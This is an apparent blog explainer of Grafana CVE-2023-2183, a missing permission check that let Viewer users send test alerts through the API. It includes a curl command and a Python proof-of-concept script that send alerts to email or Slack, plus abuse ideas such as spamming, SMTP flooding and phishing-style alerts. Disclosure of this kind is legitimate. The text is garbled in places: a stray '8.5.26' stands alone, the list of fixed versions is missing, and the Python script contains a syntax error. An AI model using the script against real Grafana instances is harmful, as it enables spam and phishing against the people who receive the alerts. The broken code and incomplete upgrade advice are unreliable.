CVE-2023-2183 - How Grafana Test Alert API Can Be Abused by Viewer Users

Grafana is a popular open-source tool used by thousands of organizations for monitoring, logging, and dashboards. Recently, an important security issue was found and fixed: CVE-2023-2183. This vulnerability allowed Grafana users with just Viewer permissions to misuse the alerting system using the API. In this post, we'll explain what happened, why it's dangerous, and how to secure your Grafana instance—plus we'll include code snippets and references for further exploration.

Summary of CVE-2023-2183

Normally, in Grafana's user interface (UI), only users with higher privileges (like Editor or Admin) could send test alerts. But due to a flaw, Viewer-level users could send test alerts through the backend API, since the API did not check the user's permissions for this action.

Viewers could send fake alerts via email or Slack to any configured channels.

- Attackers could spam team members, overwhelm alert receivers, or even use these alerts for phishing attacks.
- Overloading the SMTP server (used for emails) with fake alerts was possible, possibly taking it down.

How Does the Exploit Work?

Normally, Grafana restricts the "Send Test Alert" button in the UI. But under the hood, the API endpoint is still accessible—even for Viewers.

Using cURL

# Log in and get session cookie (or use an API key, if available)
# Then send a POST request:

curl -k -X POST \
  https://your-grafana-instance/api/alert-notifications/test \
  -H "Cookie: grafana_session=YOUR_SESSION_COOKIE_HERE" \
  -H "Content-Type: application/json" \
  -d '{"name":"Test alert","type":"email","settings":{"addresses":"user@example.com"}}'

Note: Even though the Viewer role should not have this power, the missing permissions check allows it!

Using Python (requests)

import requests

grafana_url = 'https://your-grafana-instance';
session_cookie = {'grafana_session': 'YOUR_SESSION_COOKIE_HERE'}

payload = {
    "name": "Test alert",
    "type": "slack",
    "settings": {
        "url": "https://hooks.slack.com/services/your/slack/webhook";
    }
}

response = requests.post(
    f"{grafana_url}/api/alert-notifications/test",
    json=payload,
    cookies=session_cookie
)

print(response.status_code, response.text)

This script will send a test alert to the Slack webhook (or email if you set up the payload that way), and it will work as a Viewer user.

An attacker can

- Spam teammates via email/Slack, causing annoyance or alert fatigue.

Block SMTP servers by generating a flood of outgoing messages.

- Launch phishing attacks by crafting alerts that mimic real ones, tricking users to click on malicious links.

8.5.26

To fix:

Upgrade to one of these or a newer release. Check your version

grafana-server -v

References

- Grafana Security Release Blog
- Official Advisory: CVE-2023-2183
- Grafana GitHub Release Notes
- NIST NVD Entry for CVE-2023-2183

Conclusion

CVE-2023-2183 is a simple yet impactful bug—a mistake in access control logic that could let Viewer-level users misuse sensitive alerting features. It reminds us: always double-check privilege checks on both UI and API endpoints.

Don't wait: If you use Grafana, upgrade ASAP. Monitor your API logs for any unexpected test alert traffic, and inform your team to ignore unexpected test messages until the patch is applied.

*Stay secure, and keep watching those dashboards!*

Timeline

Published on: 06/06/2023 19:15:00 UTC
Last modified on: 06/13/2023 16:30:00 UTC